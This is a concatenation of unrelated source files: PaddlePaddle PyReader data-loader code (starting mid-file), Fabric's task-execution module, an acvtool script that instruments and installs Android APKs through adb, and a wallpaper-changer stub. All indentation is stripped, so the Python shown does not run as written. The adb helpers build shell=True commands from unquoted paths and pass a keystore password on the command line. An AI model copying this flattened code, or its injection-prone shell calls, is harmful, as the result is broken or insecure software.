paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
3. If return_list=True, the return values would be presented as list instead of dict.
This is usually used in dygraph mode.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
ITER_NUM = 5
BATCH_SIZE = 10
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
yield np.random.uniform(low=0, high=255, size=[height, width]), \
np.random.random_integers(low=0, high=9, size=[1])
return reader
place = fluid.CPUPlace()
with fluid.dygraph.guard(place):
py_reader = fluid.io.PyReader(capacity=2, return_list=True)
user_defined_reader = reader_creator_random_image(784, 784)
py_reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
place)
for image, label in py_reader():
relu = fluid.layers.relu(image)
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False):
self._loader = DataLoader.from_generator(
feed_list, capacity, use_double_buffer, iterable, return_list)
@property
def queue(self):
return self._loader.queue
@property
def iterable(self):
return self._loader.iterable
def __iter__(self):
return self._loader.__iter__()
def __next__(self):
return self._loader.__next__()
def start(self):
'''
Start the data feeding thread.
Can only call when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.start()
def reset(self):
'''
Reset the reader object when :code:`fluid.core.EOFException` raises.
Can only call when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.reset()
def decorate_sample_generator(self,
sample_generator,
batch_size,
drop_last=True,
places=None):
'''
Set the data source of the PyReader object.
The provided :code:`sample_generator` should be a Python generator,
which yields list(numpy.ndarray)-typed data of each sample.
:code:`places` must be set when the PyReader object is iterable.
If all inputs have no lods, this method is faster than
:code:`decorate_sample_list_generator(paddle.batch(sample_generator, ...))` .
Args:
sample_generator (generator): Python generator that yields
list(numpy.ndarray)-typed sample data.
batch_size (int): batch size. Must be larger than 0.
drop_last (bool): Whether to drop the last batch when sample number
is less than batch_size.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.array([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_generator(user_defined_generator,
batch_size=BATCH_SIZE,
places=[fluid.CPUPlace()])
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_generator(sample_generator, batch_size,
drop_last, places)
def decorate_sample_list_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields list(numpy.ndarray) typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields
list(numpy.ndarray)-typed batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_generator, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.core.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_list_generator(reader, places)
def decorate_batch_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields numpy.ndarray-typed or LoDTensor-typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields LoDTensor-typed
batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
batch_image = np.random.uniform(low=0,
high=255,
size=[BATCH_SIZE, height, width])
batch_label = np.ones([BATCH_SIZE, 1])
batch_image = batch_image.astype('float32')
batch_label = batch_label.astype('int64')
yield batch_image, batch_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_batch_generator(user_defined_generator, fluid.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_batch_generator(reader, places)
class DatasetLoader(DataLoaderBase):
def __init__(self, dataset, places, drop_last):
assert isinstance(dataset, paddle.distributed.fleet.dataset.
DatasetBase), "dataset must be type of DatasetBase"
assert not in_dygraph_mode(
), "DatasetLoader is not supported in dygraph mode yet"
thread_num = len(places)
assert len(dataset.filelist) >= thread_num, \
"Filelist number of dataset {} must be not less than place number {}".format(len(dataset.filelist), thread_num)
if dataset.thread_num != 0 and dataset.thread_num != thread_num:
logging.warn('thread_num {} which is set in Dataset is ignored'.
format(dataset.thread_num))
dataset._set_thread(thread_num)
if isinstance(dataset, paddle.distributed.fleet.dataset.
InMemoryDataset) and dataset.queue_num > thread_num:
logging.warn("queue_num {} which is set in Dataset is ignored".
format(dataset.queue_num))
dataset._set_queue_num(thread_num)
self._dataset = dataset
use_slots = [
slot.name for slot in dataset.proto_desc.multi_slot_desc.slots
if slot.is_used
]
self._iterable_dataset = core.IterableDatasetWrapper(
dataset.dataset, use_slots,
_convert_places(places), dataset.proto_desc.batch_size, drop_last)
def __iter__(self):
self._dataset._finish_to_run()
self._dataset._prepare_to_run()
self._iterable_dataset._start()
return self
def __next__(self):
return self._iterable_dataset._next()
|
tasks.py
|
from __future__ import with_statement
from functools import wraps
import inspect
import sys
import textwrap
from fabric import state
from fabric.utils import abort, warn, error
from fabric.network import to_dict, normalize_to_string, disconnect_all
from fabric.context_managers import settings
from fabric.job_queue import JobQueue
from fabric.task_utils import crawl, merge, parse_kwargs
from fabric.exceptions import NetworkError
if sys.version_info[:2] == (2, 5):
# Python 2.5 inspect.getargspec returns a tuple
# instead of ArgSpec namedtuple.
class ArgSpec(object):
def __init__(self, args, varargs, keywords, defaults):
self.args = args
self.varargs = varargs
self.keywords = keywords
self.defaults = defaults
self._tuple = (args, varargs, keywords, defaults)
def __getitem__(self, idx):
return self._tuple[idx]
def patched_get_argspec(func):
return ArgSpec(*inspect._getargspec(func))
inspect._getargspec = inspect.getargspec
inspect.getargspec = patched_get_argspec
def get_task_details(task):
details = [
textwrap.dedent(task.__doc__)
if task.__doc__
else 'No docstring provided']
argspec = inspect.getargspec(task)
default_args = [] if not argspec.defaults else argspec.defaults
num_default_args = len(default_args)
args_without_defaults = argspec.args[:len(argspec.args) - num_default_args]
args_with_defaults = argspec.args[-1 * num_default_args:]
details.append('Arguments: %s' % (
', '.join(
args_without_defaults + [
'%s=%r' % (arg, default)
for arg, default in zip(args_with_defaults, default_args)
])
))
return '\n'.join(details)
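# Example (illustrative task, not from the Fabric codebase): for a task defined as
#   def deploy(environment, branch='master'):
#       """Deploy the given branch."""
# get_task_details(deploy) would return roughly:
#   Deploy the given branch.
#   Arguments: environment, branch='master'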
def _get_list(env):
def inner(key):
return env.get(key, [])
return inner
class Task(object):
"""
Abstract base class for objects wishing to be picked up as Fabric tasks.
Instances of subclasses will be treated as valid tasks when present in
fabfiles loaded by the :doc:`fab </usage/fab>` tool.
For details on how to implement and use `~fabric.tasks.Task` subclasses,
please see the usage documentation on :ref:`new-style tasks
<new-style-tasks>`.
.. versionadded:: 1.1
"""
name = 'undefined'
use_task_objects = True
aliases = None
is_default = False
# TODO: make it so that this wraps other decorators as expected
def __init__(self, alias=None, aliases=None, default=False, name=None,
*args, **kwargs):
if alias is not None:
self.aliases = [alias, ]
if aliases is not None:
self.aliases = aliases
if name is not None:
self.name = name
self.is_default = default
def __details__(self):
return get_task_details(self.run)
def run(self):
raise NotImplementedError
def get_hosts_and_effective_roles(self, arg_hosts, arg_roles, arg_exclude_hosts, env=None):
"""
Return a tuple containing the host list the given task should be using
and the roles being used.
See :ref:`host-lists` for detailed documentation on how host lists are
set.
.. versionchanged:: 1.9
"""
env = env or {'hosts': [], 'roles': [], 'exclude_hosts': []}
roledefs = env.get('roledefs', {})
# Command line per-task takes precedence over anything else.
if arg_hosts or arg_roles:
return merge(arg_hosts, arg_roles, arg_exclude_hosts, roledefs), arg_roles
# Decorator-specific hosts/roles go next
func_hosts = getattr(self, 'hosts', [])
func_roles = getattr(self, 'roles', [])
if func_hosts or func_roles:
return merge(func_hosts, func_roles, arg_exclude_hosts, roledefs), func_roles
# Finally, the env is checked (which might contain globally set lists
# from the CLI or from module-level code). This will be the empty list
# if these have not been set -- which is fine, this method should
# return an empty list if no hosts have been set anywhere.
env_vars = map(_get_list(env), "hosts roles exclude_hosts".split())
env_vars.append(roledefs)
return merge(*env_vars), env.get('roles', [])
def get_pool_size(self, hosts, default):
# Default parallel pool size (calculate per-task in case variables
# change)
default_pool_size = default or len(hosts)
# Allow per-task override
# Also cast to int in case somebody gave a string
from_task = getattr(self, 'pool_size', None)
pool_size = int(from_task or default_pool_size)
# But ensure it's never larger than the number of hosts
pool_size = min((pool_size, len(hosts)))
# Inform user of final pool size for this task
if state.output.debug:
print("Parallel tasks now using pool size of %d" % pool_size)
return pool_size
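    # Example (illustrative): with 10 hosts, env.pool_size unset and a
    # task-level pool_size attribute of 4, get_pool_size() returns
    # min(4, 10) == 4.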
class WrappedCallableTask(Task):
"""
Wraps a given callable transparently, while marking it as a valid Task.
Generally used via `~fabric.decorators.task` and not directly.
.. versionadded:: 1.1
.. seealso:: `~fabric.docs.unwrap_tasks`, `~fabric.decorators.task`
"""
def __init__(self, callable, *args, **kwargs):
super(WrappedCallableTask, self).__init__(*args, **kwargs)
self.wrapped = callable
# Don't use getattr() here -- we want to avoid touching self.name
# entirely so the superclass' value remains default.
if hasattr(callable, '__name__'):
if self.name == 'undefined':
self.__name__ = self.name = callable.__name__
else:
self.__name__ = self.name
if hasattr(callable, '__doc__'):
self.__doc__ = callable.__doc__
if hasattr(callable, '__module__'):
self.__module__ = callable.__module__
def __call__(self, *args, **kwargs):
return self.run(*args, **kwargs)
def run(self, *args, **kwargs):
return self.wrapped(*args, **kwargs)
def __getattr__(self, k):
return getattr(self.wrapped, k)
def __details__(self):
orig = self
while 'wrapped' in orig.__dict__:
orig = orig.__dict__.get('wrapped')
return get_task_details(orig)
def requires_parallel(task):
"""
Returns True if given ``task`` should be run in parallel mode.
Specifically:
* It's been explicitly marked with ``@parallel``, or:
* It's *not* been explicitly marked with ``@serial`` *and* the global
parallel option (``env.parallel``) is set to ``True``.
"""
return (
(state.env.parallel and not getattr(task, 'serial', False))
or getattr(task, 'parallel', False)
)
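# Illustrative outcomes of requires_parallel (not exhaustive):
#   task decorated with @parallel, env.parallel False -> True
#   undecorated task,              env.parallel True  -> True
#   task decorated with @serial,   env.parallel True  -> False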
def _parallel_tasks(commands_to_run):
return any(map(
lambda x: requires_parallel(crawl(x[0], state.commands)),
commands_to_run
))
def _is_network_error_ignored():
return not state.env.use_exceptions_for['network'] and state.env.skip_bad_hosts
def _execute(task, host, my_env, args, kwargs, jobs, queue, multiprocessing):
"""
Primary single-host work body of execute()
"""
# Log to stdout
if state.output.running and not hasattr(task, 'return_value'):
print("[%s] Executing task '%s'" % (host, my_env['command']))
# Create per-run env with connection settings
local_env = to_dict(host)
local_env.update(my_env)
# Set a few more env flags for parallelism
if queue is not None:
local_env.update({'parallel': True, 'linewise': True})
# Handle parallel execution
if queue is not None: # Since queue is only set for parallel
name = local_env['host_string']
# Wrap in another callable that:
# * expands the env it's given to ensure parallel, linewise, etc are
# all set correctly and explicitly. Such changes are naturally
        # insulated from the parent process.
# * nukes the connection cache to prevent shared-access problems
# * knows how to send the tasks' return value back over a Queue
# * captures exceptions raised by the task
def inner(args, kwargs, queue, name, env):
state.env.update(env)
def submit(result):
queue.put({'name': name, 'result': result})
try:
state.connections.clear()
submit(task.run(*args, **kwargs))
except BaseException, e: # We really do want to capture everything
# SystemExit implies use of abort(), which prints its own
# traceback, host info etc -- so we don't want to double up
# on that. For everything else, though, we need to make
# clear what host encountered the exception that will
# print.
if e.__class__ is not SystemExit:
if not (isinstance(e, NetworkError) and
_is_network_error_ignored()):
sys.stderr.write("!!! Parallel execution exception under host %r:\n" % name)
submit(e)
# Here, anything -- unexpected exceptions, or abort()
# driven SystemExits -- will bubble up and terminate the
# child process.
if not (isinstance(e, NetworkError) and
_is_network_error_ignored()):
raise
# Stuff into Process wrapper
kwarg_dict = {
'args': args,
'kwargs': kwargs,
'queue': queue,
'name': name,
'env': local_env,
}
p = multiprocessing.Process(target=inner, kwargs=kwarg_dict)
# Name/id is host string
p.name = name
# Add to queue
jobs.append(p)
# Handle serial execution
else:
with settings(**local_env):
return task.run(*args, **kwargs)
def _is_task(task):
return isinstance(task, Task)
def execute(task, *args, **kwargs):
"""
Execute ``task`` (callable or name), honoring host/role decorators, etc.
``task`` may be an actual callable object, or it may be a registered task
name, which is used to look up a callable just as if the name had been
given on the command line (including :ref:`namespaced tasks <namespaces>`,
e.g. ``"deploy.migrate"``.
The task will then be executed once per host in its host list, which is
(again) assembled in the same manner as CLI-specified tasks: drawing from
:option:`-H`, :ref:`env.hosts <hosts>`, the `~fabric.decorators.hosts` or
`~fabric.decorators.roles` decorators, and so forth.
``host``, ``hosts``, ``role``, ``roles`` and ``exclude_hosts`` kwargs will
be stripped out of the final call, and used to set the task's host list, as
if they had been specified on the command line like e.g. ``fab
taskname:host=hostname``.
Any other arguments or keyword arguments will be passed verbatim into
``task`` (the function itself -- not the ``@task`` decorator wrapping your
function!) when it is called, so ``execute(mytask, 'arg1',
kwarg1='value')`` will (once per host) invoke ``mytask('arg1',
kwarg1='value')``.
:returns:
a dictionary mapping host strings to the given task's return value for
that host's execution run. For example, ``execute(foo, hosts=['a',
'b'])`` might return ``{'a': None, 'b': 'bar'}`` if ``foo`` returned
nothing on host `a` but returned ``'bar'`` on host `b`.
In situations where a task execution fails for a given host but overall
progress does not abort (such as when :ref:`env.skip_bad_hosts
<skip-bad-hosts>` is True) the return value for that host will be the
error object or message.
.. seealso::
:ref:`The execute usage docs <execute>`, for an expanded explanation
and some examples.
.. versionadded:: 1.3
.. versionchanged:: 1.4
Added the return value mapping; previously this function had no defined
return value.
"""
my_env = {'clean_revert': True}
results = {}
# Obtain task
is_callable = callable(task)
if not (is_callable or _is_task(task)):
# Assume string, set env.command to it
my_env['command'] = task
task = crawl(task, state.commands)
if task is None:
msg = "%r is not callable or a valid task name" % (my_env['command'],)
if state.env.get('skip_unknown_tasks', False):
warn(msg)
return
else:
abort(msg)
# Set env.command if we were given a real function or callable task obj
else:
dunder_name = getattr(task, '__name__', None)
my_env['command'] = getattr(task, 'name', dunder_name)
# Normalize to Task instance if we ended up with a regular callable
if not _is_task(task):
task = WrappedCallableTask(task)
# Filter out hosts/roles kwargs
new_kwargs, hosts, roles, exclude_hosts = parse_kwargs(kwargs)
# Set up host list
my_env['all_hosts'], my_env['effective_roles'] = task.get_hosts_and_effective_roles(hosts, roles,
exclude_hosts, state.env)
parallel = requires_parallel(task)
if parallel:
# Import multiprocessing if needed, erroring out usefully
# if it can't.
try:
import multiprocessing
except ImportError:
import traceback
tb = traceback.format_exc()
abort(tb + """
At least one task needs to be run in parallel, but the
multiprocessing module cannot be imported (see above
traceback.) Please make sure the module is installed
or that the above ImportError is fixed.""")
else:
multiprocessing = None
# Get pool size for this task
pool_size = task.get_pool_size(my_env['all_hosts'], state.env.pool_size)
# Set up job queue in case parallel is needed
queue = multiprocessing.Queue() if parallel else None
jobs = JobQueue(pool_size, queue)
if state.output.debug:
jobs._debug = True
# Call on host list
if my_env['all_hosts']:
# Attempt to cycle on hosts, skipping if needed
for host in my_env['all_hosts']:
try:
results[host] = _execute(
task, host, my_env, args, new_kwargs, jobs, queue,
multiprocessing
)
except NetworkError, e:
results[host] = e
# Backwards compat test re: whether to use an exception or
# abort
if not state.env.use_exceptions_for['network']:
func = warn if state.env.skip_bad_hosts else abort
error(e.message, func=func, exception=e.wrapped)
else:
raise
# If requested, clear out connections here and not just at the end.
if state.env.eagerly_disconnect:
disconnect_all()
# If running in parallel, block until job queue is emptied
if jobs:
err = "One or more hosts failed while executing task '%s'" % (
my_env['command']
)
jobs.close()
# Abort if any children did not exit cleanly (fail-fast).
# This prevents Fabric from continuing on to any other tasks.
# Otherwise, pull in results from the child run.
ran_jobs = jobs.run()
for name, d in ran_jobs.iteritems():
if d['exit_code'] != 0:
if isinstance(d['results'], NetworkError) and \
_is_network_error_ignored():
error(d['results'].message, func=warn, exception=d['results'].wrapped)
elif isinstance(d['results'], BaseException):
error(err, exception=d['results'])
else:
error(err)
results[name] = d['results']
# Or just run once for local-only
else:
with settings(**my_env):
results['<local-only>'] = task.run(*args, **new_kwargs)
# Return what we can from the inner task executions
return results
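# Example (illustrative hosts and task): running a task on two hosts and
# collecting its per-host return values, as documented above:
#   results = execute(my_task, 'arg1', hosts=['web1', 'web2'])
#   # -> {'web1': <my_task return value>, 'web2': <my_task return value>}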
|
smiler.py
|
import os
import subprocess
import re
import shutil
import threading
import signal
import logging
import time
from config import config
from granularity import Granularity
from instrumenting import manifest_instrumenter
from libs.libs import Libs
from instrumenting.apkil.smalitree import SmaliTree
from instrumenting.apktool_interface import ApktoolInterface
from instrumenting.smali_instrumenter import Instrumenter
from instrumenting.utils import timeit
from instrumenting.utils import Utils
apk_info_pattern = re.compile("package: name='(?P<package>.*?)'")
CRASH_REPORT_FILENAME = "errors.txt"
def install(new_apk_path):
logging.info("installing")
cmd = '{} install -r "{}"'.format(config.adb_path, new_apk_path)
out = request_pipe(cmd)
logging.info(out)
def uninstall(package):
logging.info("uninstalling")
cmd = '{} uninstall "{}"'.format(config.adb_path, package)
out = request_pipe(cmd)
logging.info(out)
def request_pipe(cmd):
pipe = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
out, err = pipe.communicate()
res = out
if not out:
res = err
if pipe.returncode > 0:
raise Exception("----------------------------------------------------\n\
Out: %s\nError: %s" % (out, err))
return res
def get_apk_properties(path):
info_cmd = "%s dump badging %s" % (config.aapt_path, path)
out = request_pipe(info_cmd)
matched = re.match(apk_info_pattern, out)
package_name = matched.group('package')
return apkinfo(package_name, "", "")
def get_package_files_list(package_name):
cmd = '%s shell ls "/mnt/sdcard/%s/"' % (config.adb_path, package_name)
out = request_pipe(cmd)
files = [f for f in out.split() if not f.endswith('/')]
return files
def get_execution_results(package_name, output_dir):
result_files = get_package_files_list(package_name)
coverage_files = [f for f in result_files if f.endswith(".ec")]
crash_file = CRASH_REPORT_FILENAME if CRASH_REPORT_FILENAME in result_files else None
if not (coverage_files or crash_file):
raise Exception("No coverage or crash report files have been detected on the device for {} package.\n\
Run acvtool with \'-start\' argument to produce coverage.".format(package_name))
if os.path.exists(output_dir):
shutil.rmtree(output_dir)
os.makedirs(output_dir)
for f in result_files:
adb_pull(package_name, f, output_dir)
adb_delete_files(package_name, f)
if crash_file:
adb_pull(package_name, crash_file, output_dir)
adb_delete_files(package_name, crash_file)
def adb_pull(package_name, file_path, pull_to):
cmd = "%s pull mnt/sdcard/%s/%s %s" % (config.adb_path, package_name, file_path, os.path.abspath(pull_to))
out = request_pipe(cmd)
logging.info(out)
def adb_delete_files(package_name, file_name):
cmd = "%s shell rm mnt/sdcard/%s/%s" % (config.adb_path, package_name, file_name)
out = request_pipe(cmd)
def grant_storage_permission(package):
read_storage_cmd = "{0} shell pm grant {1} android.permission.READ_EXTERNAL_STORAGE".format(config.adb_path, package)
subprocess.call(read_storage_cmd, shell=True)
write_storage_cmd = "{0} shell pm grant {1} android.permission.WRITE_EXTERNAL_STORAGE".format(config.adb_path, package)
subprocess.call(write_storage_cmd, shell=True)
def start_instrumenting(package, release_thread=False, onstop=None, timeout=None):
grant_storage_permission(package)
lock_thread = "" if release_thread else "-w"
cmd = '{} shell am instrument -e coverage true {} {}/{}'.format(config.adb_path, lock_thread, package, config.INSTRUMENTING_NAME)
if release_thread:
os.system(cmd)
return
out = ''
def run():
out = request_pipe(cmd)
logging.info(out)
original_sigint = signal.getsignal(signal.SIGINT)
def stop(signum, frame):
signal.signal(signal.SIGINT, original_sigint)
stop_instrumenting(package, timeout)
if onstop:
onstop()
t = threading.Thread(target=run)
t.start()
print("Press Ctrl+C to finish ...")
signal.signal(signal.SIGINT, stop)
def coverage_is_locked(package_name):
cmd = "{} shell \"test -e /mnt/sdcard/{}.lock > /dev/null 2>&1 && echo \'1\' || echo \'0\'\"".format(config.adb_path, package_name)
logging.debug('Command to check lock file:' + cmd)
locked = subprocess.check_output(cmd, shell=True).replace("\n","").replace("\r", "")
return locked == '1'
def stop_instrumenting(package_name, timeout=None):
cmd = "{} shell am broadcast -a 'tool.acv.finishtesting'".format(config.adb_path)
logging.info("finish testing")
result = subprocess.call(cmd, shell=True)
logging.info(result)
locked = coverage_is_locked(package_name)
if timeout is None:
timeout = config.default_onstop_timeout
while locked and timeout:
logging.info("wait until the coverage file is saved {}".format(package_name))
time.sleep(1)
locked = coverage_is_locked(package_name)
timeout -= 1
files = get_package_files_list(package_name)
coverage_files = [f for f in files if f.endswith(".ec")]
crash_file = CRASH_REPORT_FILENAME if CRASH_REPORT_FILENAME in files else None
logging.info("coverage files at /mnt/sdcard/{0}:".format(package_name))
logging.info("\n".join(coverage_files))
if crash_file:
logging.info("crash report /mnt/sdcard/{0}/{1}".format(package_name, crash_file))
@timeit
def instrument_apk(apk_path, result_dir, dbg_start=None, dbg_end=None, installation=False, granularity=Granularity.default, mem_stats=None):
'''
Assumes the caller has already verified that result_dir is empty.
'''
apktool = ApktoolInterface(javaPath = config.APKTOOL_JAVA_PATH,
javaOpts = config.APKTOOL_JAVA_OPTS,
pathApktool = Libs.APKTOOL_PATH,
jarApktool = Libs.APKTOOL_PATH)
package = get_apk_properties(apk_path).package
unpacked_data_path = decompile_apk(apktool, apk_path, package, result_dir)
manifest_path = get_path_to_manifest(unpacked_data_path)
logging.info("decompiled {0}".format(package))
instrument_manifest(manifest_path)
smali_code_path = get_path_to_smali_code(unpacked_data_path)
pickle_path = get_pickle_path(apk_path, result_dir)
instrument_smali_code(smali_code_path, pickle_path, package, granularity, dbg_start, dbg_end, mem_stats)
logging.info("instrumented")
instrumented_package_path = get_path_to_instrumented_package(apk_path, result_dir)
remove_if_exits(instrumented_package_path)
build_apk(apktool, unpacked_data_path, instrumented_package_path)
Utils.rm_tree(unpacked_data_path)
logging.info("built")
instrumented_apk_path = get_path_to_insrumented_apk(instrumented_package_path, result_dir)
sign_align_apk(instrumented_package_path, instrumented_apk_path)
logging.info("apk instrumented: {0}".format(instrumented_apk_path))
logging.info("package name: {0}".format(package))
if installation:
install(instrumented_apk_path)
return (package, instrumented_apk_path, pickle_path)
def remove_if_exits(path):
if os.path.exists(path):
os.remove(path)
def build_dir(apktool_dir, result_dir, signature=False, installation=False):
apktool = ApktoolInterface(javaPath = config.APKTOOL_JAVA_PATH,
javaOpts = config.APKTOOL_JAVA_OPTS,
pathApktool = Libs.APKTOOL_PATH,
jarApktool = Libs.APKTOOL_PATH)
build_pkg_path = os.path.join(result_dir, "build_temp.apk")
build_apk(apktool, apktool_dir, build_pkg_path)
package = get_apk_properties(build_pkg_path).package
result_apk_path = build_pkg_path
if signature:
result_apk_path = os.path.join(result_dir, "build_{0}.apk".format(package))
sign_align_apk(build_pkg_path, result_apk_path)
print('apk was built and signed: {0}'.format(result_apk_path))
else:
print('apk was built: {0}'.format(result_apk_path))
if installation:
install(result_apk_path)
return result_apk_path
def decompile_apk(apktool, apk_path, package, result_dir):
unpacked_data_path = os.path.join(result_dir, "apktool", package)
(run_successful, cmd_output) = apktool.decode(apkPath = apk_path,
dirToDecompile = unpacked_data_path,
quiet = True,
noSrc = False,
noRes = False,
debug = False,
noDebugInfo = False,
force = True, # the directory may already exist; without force apktool would stop
frameworkTag = "",
frameworkDir = "",
keepBrokenRes = False,
forceManifest = True)
if not run_successful:
print("Run is not successful!")
return unpacked_data_path
def get_path_to_manifest(unpacked_data_path):
pth = os.path.join(unpacked_data_path, "AndroidManifest.xml")
return pth
def get_path_to_smali_code(unpacked_data_path):
pth = os.path.join(unpacked_data_path, "smali")
return pth
def get_path_to_instrumentation_metadata_dir(result_dir):
pth = os.path.join(result_dir, "metadata")
return pth
def get_path_to_insrumented_apk(apk_path, result_dir):
apk_dir, apk_fname = os.path.split(apk_path)
new_apk_fname = "{}_{}".format("instr", apk_fname)
pth = os.path.join(result_dir, new_apk_fname)
return pth
def get_path_to_instrumented_package(apk_path, result_dir):
apk_dir, apk_fname = os.path.split(apk_path)
path = os.path.join(result_dir, apk_fname)
return path
def get_pickle_path(apk_path, result_dir):
apk_dir, apk_fname = os.path.split(apk_path)
metadata_dir = get_path_to_instrumentation_metadata_dir(result_dir)
return os.path.join(metadata_dir, "{}.pickle".format(apk_fname[:-4]))
def instrument_manifest(manifest_path):
manifest_instrumenter.instrumentAndroidManifestFile(manifest_path, addSdCardPermission=True)
@timeit
def instrument_smali_code(input_smali_dir, pickle_path, package, granularity, dbg_start=None, dbg_end=None, mem_stats=None):
smali_tree = SmaliTree(input_smali_dir)
smali_instrumenter = Instrumenter(smali_tree, granularity, package, dbg_start, dbg_end, mem_stats)
smali_instrumenter.save_instrumented_smali(input_smali_dir)
smali_instrumenter.save_pickle(pickle_path)
def sign_align_apk(instrumented_package_path, output_apk):
aligned_apk_path = instrumented_package_path.replace('.apk', '_signed_tmp.apk')
align_cmd = '"{}" -f 4 "{}" "{}"'.format(config.zipalign, instrumented_package_path, aligned_apk_path)
request_pipe(align_cmd)
apksigner_cmd = '{} sign --ks {} --ks-pass pass:{} --out {} {}'\
.format(config.apksigner_path, config.keystore_path, config.keystore_password, output_apk, aligned_apk_path)
request_pipe(apksigner_cmd)
os.remove(aligned_apk_path)
def build_apk(apktool, apkdata_dir, new_apk_path):
apktool.build(srcPath=apkdata_dir, finalApk=new_apk_path, forceAll=True,
debug=False)
class apkinfo(object):
"""Properties of the apk file."""
def __init__(self, package=None, sdkversion=None, targetsdkverion=None):
self.package = package
self.sdkversion = sdkversion
self.targetsdkversion = targetsdkverion
def __repr__(self):
return "%s %s %s" % (self.package, self.sdkversion, self.targetsdkversion)
|
main.py
|
# -*- coding: UTF-8 -*-
from functions import *
command = []
used = []
TIME_INTERVAL = 600 # wallpaper change interval (seconds)
running = r"D:\waifu2x-caffe\waifu2x-caffe-cui.exe" # path to waifu2x-caffe-cui.exe
path = r'D:\Sean\我的图片\WallPaper\osusume' # folder containing the wallpaper files
tmp_path = r'D:\test\tmp' # folder for temporary files
if not os.path.exists(tmp_path):
os.mkdir(tmp_path)
paper = Command(path, tmp_path)
